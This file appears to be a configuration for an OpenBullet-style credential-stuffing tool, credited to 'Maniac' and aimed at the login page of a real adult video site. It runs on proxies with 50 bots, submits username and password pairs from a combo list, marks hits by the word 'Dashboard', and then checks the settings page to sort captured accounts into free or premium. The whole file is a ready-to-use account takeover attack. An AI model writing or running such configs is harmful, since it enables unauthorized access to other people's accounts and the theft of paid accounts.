[SETTINGS]
{
  "Name": "YouPorn",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-06-08T17:00:13.404516+02:00",
  "AdditionalInfo": "",
  "Author": "Maniac",
  "Version": "1.1.2",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://www.youporn.com/login/" 
  CONTENT "login%5Busername%5D=<USER>&login%5Bpassword%5D=<PASS>&login%5Bprevious%5D=&login%5Blocal_data%5D=%7B%7D" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.youporn.com" 
  HEADER "Referer: https://www.youporn.com/login/" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Bad credentials." 
  KEYCHAIN Success OR 
    KEY "Dashboard" 

REQUEST GET "https://www.youporn.com/settings/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY ">Not a YouPorn member yet?</" 
    KEY "Not a YouPorn Premium Member?" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "=\"upgrade_button\"><" 

